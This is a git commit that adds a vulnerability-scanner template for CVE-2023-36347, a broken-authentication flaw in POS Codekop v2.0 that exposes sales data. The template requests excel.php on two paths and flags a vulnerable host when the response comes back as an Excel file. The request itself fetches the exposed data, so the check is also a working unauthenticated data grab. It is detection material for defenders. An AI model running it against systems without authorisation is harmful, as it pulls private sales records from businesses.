Create CVE-2023-36347.yaml

patch-2
Prince Chaddha 2024-05-13 09:13:34 +05:30 committed by GitHub
parent d32712c2f0
commit 903c94b707
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2023-36347
info:
name: POS Codekop v2.0 - Broken Authentication
author: princechaddha
severity: high
description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
impact: |
Successful exploitation could lead to unauthorized access to sensitive information.
remediation: |
Implement proper authentication mechanisms and ensure secure user session management.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36347
cwe-id: CWE-306
epss-score: 0.00103
epss-percentile: 0.41216
cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
metadata:
vendor: codekop
product: codekop
tags: cve,cve2023,codekop,pos,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/excel.php"
- "{{BaseURL}}/pos-kasir-php/excel.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Document"
- type: word
part: header
words:
- "application/vnd.ms-excel"